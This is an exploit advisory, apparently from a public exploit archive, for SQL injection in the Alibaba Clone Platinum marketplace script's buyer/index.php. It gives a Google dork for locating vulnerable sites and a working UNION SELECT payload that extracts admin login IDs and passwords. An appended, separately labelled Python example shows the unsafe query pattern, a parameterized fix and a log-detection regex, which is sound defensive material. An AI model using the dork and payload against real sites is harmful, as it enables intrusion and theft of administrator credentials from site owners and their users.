# Title: Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
# Author: GuN
# Published: 2010-14-05
# Verified: yes

........../¯¯/).................(\¯¯\..........
........./¯.//....................\\.¯\.........
......../..//.........GuN........\\..\........
../´¯`/'
/´`\...WJA-TEAM../´`\ '\`´¯\...
./
'/ / / /¨/¯\................./¯\¨\ \ \ \' \.
(
'( ´ ´ ¯\/'' )................( ''/\¯ ` ` )' )

-----------------------------------------------------------------------
Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author    : GuN
Location  : Tunisia - Tunis - Lycée el Omrane
Time Zone : GMT +1:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Alibaba Clone Platinum
Vendor      : http://www.alibabaclone.com/
Price       : $699 USD
Google Dork : allinurl:buyer/index.php?ProductID=
Overview    : B2B trading marketplace script, a clone of Alibaba. The marketplace
script is a wonderful solution to launch your own business-to-business and B2C
site. The script is packed with lots of features to provide a very sound
foundation for your trading portal site.

Exploit:
~~~~~~~
-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--

SQLi GuN:
~~~~~~~

http://127.0.0.1/[patch]/buyer/index.php?ProductID=&BuyerID=
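The following is an added example, not part of GuN's advisory and not the vendor's code, written from the defender's side. It assumes a hypothetical product lookup of the form `SELECT ... FROM products WHERE ProductID = ...` behind buyer/index.php (the real query is not on this page), uses Python's sqlite3 in place of the application's MySQL, and constructs its own sample access-log lines. It shows the string-concatenation pattern that lets the ProductID value above become part of the statement, the parameterized form that closes it, and a coarse access-log signature for UNION-based injection attempts.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit


# Hypothetical stand-in for the lookup in buyer/index.php (assumed, not the
# vendor's code). Concatenating the parameter into the SQL text is what turns a
# value such as "-22 UNION all SELECT ... from admin--" into executable SQL.
def build_query_unsafe(product_id: str) -> str:
    return f"SELECT ProductID, name FROM products WHERE ProductID = {product_id}"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory catalogue standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (ProductID INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(22, "widget"), (23, "gadget")])
    conn.commit()
    return conn


def lookup_product_safe(conn: sqlite3.Connection, product_id: str) -> list:
    """Hardened form: the value is bound as a parameter, so it is only ever
    compared against ProductID and never parsed as SQL. A UNION payload
    simply matches no row."""
    cur = conn.execute(
        "SELECT ProductID, name FROM products WHERE ProductID = ?", (product_id,))
    return cur.fetchall()


# Detection: a coarse signature for UNION-based injection in query-string values.
# It is a triage signal, not proof; review the flagged requests.
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.IGNORECASE | re.DOTALL)
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def flag_sqli_request(log_line: str) -> list:
    """Return (parameter, decoded value) pairs from one access-log line whose
    query-string values look like UNION SELECT injection attempts."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    hits = []
    # parse_qs URL-decodes the values, including '+' to space.
    for name, values in parse_qs(query).items():
        for value in values:
            if UNION_SELECT.search(value):
                hits.append((name, value))
    return hits


# Constructed sample access-log lines (not captured from any real server).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [14/May/2010:10:00:00 +0100] "GET /shop/buyer/index.php'
    '?ProductID=-22+UNION+all+SELECT+1,2,version()+from+admin--&BuyerID= HTTP/1.1" 200 512',
    '10.0.0.9 - - [14/May/2010:10:00:07 +0100] "GET /shop/buyer/index.php'
    '?ProductID=22&BuyerID=7 HTTP/1.1" 200 4096',
]


if __name__ == "__main__":
    conn = make_db()
    payload = "-22 UNION all SELECT 1,2,version() from admin--"
    print("unsafe query text     :", build_query_unsafe(payload))
    print("safe lookup, benign id:", lookup_product_safe(conn, "22"))
    print("safe lookup, payload  :", lookup_product_safe(conn, payload))
    for line in SAMPLE_LOG_LINES:
        print("flagged:", flag_sqli_request(line))
```

The safe lookup returns the matching product for `22` and an empty result for the injected value, because the bound parameter is compared as data rather than spliced into the statement; the same applies to MySQL prepared statements in PHP (mysqli or PDO). The log check is deliberately narrow so that it can be run over real access logs as a first pass.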

GreetZ To: Sparta <==> Amino <==> HassenO <==> Anis
<3 Inter <==> Volc4n0 <==> Vbspiders.com

Contact:

XGuN@Hacker.Ps
~~~~
XGuN@ViP.Cn
~~~~